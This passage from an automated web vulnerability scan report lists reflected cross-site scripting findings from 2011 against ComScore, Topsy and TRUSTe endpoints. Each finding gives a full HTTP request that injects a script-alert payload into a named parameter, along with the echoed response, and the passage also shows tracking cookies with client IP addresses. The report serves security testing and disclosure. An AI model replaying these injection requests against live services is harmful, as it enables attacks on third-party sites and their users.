Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf55d4<script>alert(1)</script>861c9a51b7f("");
2.77. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1aacd<script>alert(1)</script>2221065b157 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=21aacd<script>alert(1)</script>2221065b157&c2=6035094&c3=&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"21aacd<script>alert(1)</script>2221065b157", c2:"6035094", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


2.78. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 33ba2<script>alert(1)</script>13cb4f86f11 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmashable.com%2F&c5=&c6=&c10=33ba2<script>alert(1)</script>13cb4f86f11&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:30:17 GMT
Date: Thu, 12 May 2011 13:30:17 GMT
Connection: close
Content-Length: 1255

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://mashable.com/", c5:"", c6:"", c10:"33ba2<script>alert(1)</script>13cb4f86f11", c15:"", c16:"", r:""});


2.79. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 92915<script>alert(1)</script>efbb621c20e was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=&c6=&c15=92915<script>alert(1)</script>efbb621c20e&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:56 GMT
Date: Thu, 12 May 2011 13:27:56 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"92915<script>alert(1)</script>efbb621c20e", c16:"", r:""});


2.80. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9dde8<script>alert(1)</script>7b980e7bea was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=60350949dde8<script>alert(1)</script>7b980e7bea&c3=&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"60350949dde8<script>alert(1)</script>7b980e7bea", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


2.81. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload e4e1a<script>alert(1)</script>5bede08ec18 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=e4e1a<script>alert(1)</script>5bede08ec18&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"e4e1a<script>alert(1)</script>5bede08ec18", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


2.82. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ff61b<script>alert(1)</script>190415549b6 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=ff61b<script>alert(1)</script>190415549b6&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"ff61b<script>alert(1)</script>190415549b6", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


2.83. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 96ad7<script>alert(1)</script>4047793bf11 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=96ad7<script>alert(1)</script>4047793bf11&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"96ad7<script>alert(1)</script>4047793bf11", c6:"", c10:"", c15:"", c16:"", r:""});


2.84. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 1ce64<script>alert(1)</script>e9a688821fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=&c6=1ce64<script>alert(1)</script>e9a688821fa&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"", c6:"1ce64<script>alert(1)</script>e9a688821fa", c10:"", c15:"", c16:"", r:""});


2.85. http://button.topsy.com/widget/retweet-json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 538ee<script>alert(1)</script>75c4880b403 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id1-3-1-7-1-1-20-3-1&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&callback=topsyWidgetCallback538ee<script>alert(1)</script>75c4880b403 HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 12 May 2011 13:33:04 GMT
Last-Modified: Thu, 12 May 2011 13:32:59 GMT
Server: lighttpd/1.4.26
Content-Length: 436
Date: Thu, 12 May 2011 13:32:59 GMT
X-Varnish: 1053771630
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: ps166
X-Cache: MISS

topsyWidgetCallback538ee<script>alert(1)</script>75c4880b403({ "html_id": "topsy_id1-3-1-7-1-1-20-3-1", "url": "http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/", "count": "0", "badge": "", "trackback_url": "http://tops
...[SNIP]...
2.86. http://button.topsy.com/widget/retweet-json [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 1dcf9<script>alert(1)</script>6a054643f01 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id1-3-1-7-1-1-20-3-11dcf9<script>alert(1)</script>6a054643f01&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&callback=topsyWidgetCallback HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 12 May 2011 13:32:56 GMT
Last-Modified: Thu, 12 May 2011 13:32:51 GMT
Server: lighttpd/1.4.26
Content-Length: 436
Date: Thu, 12 May 2011 13:32:51 GMT
X-Varnish: 1053761882
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: ps166
X-Cache: MISS

topsyWidgetCallback({ "html_id": "topsy_id1-3-1-7-1-1-20-3-11dcf9<script>alert(1)</script>6a054643f01", "url": "http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/", "count": "0", "badge": "", "trackback_url": "http://topsy.com/www.gizmodo.com.au/2011/05/google-c
...[SNIP]...
2.87. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 68458<script>alert(1)</script>6f4e5e61299 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont168458<script>alert(1)</script>6f4e5e61299&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4472

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont168458<script>alert(1)</script>6f4e5e61299_ib = '<div id="te-clr1-att02cont168458<script>
...[SNIP]...
2.88. http://choices.truste.com/ca [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 41838<script>alert(1)</script>e9abb0011f3 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=25041838<script>alert(1)</script>e9abb0011f3&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':25041838<script>alert(1)</script>e9abb0011f3,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1'
...[SNIP]...
2.89. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload e9290<script>alert(1)</script>e98193a566a was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctre9290<script>alert(1)</script>e98193a566a HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctre9290<script>alert(1)</script>e98193a566a','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://choices.trust
...[SNIP]...
2.90. http://choices.truste.com/ca [ox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 1e2fc<script>alert(1)</script>485c4866fa1 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=201e2fc<script>alert(1)</script>485c4866fa1&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
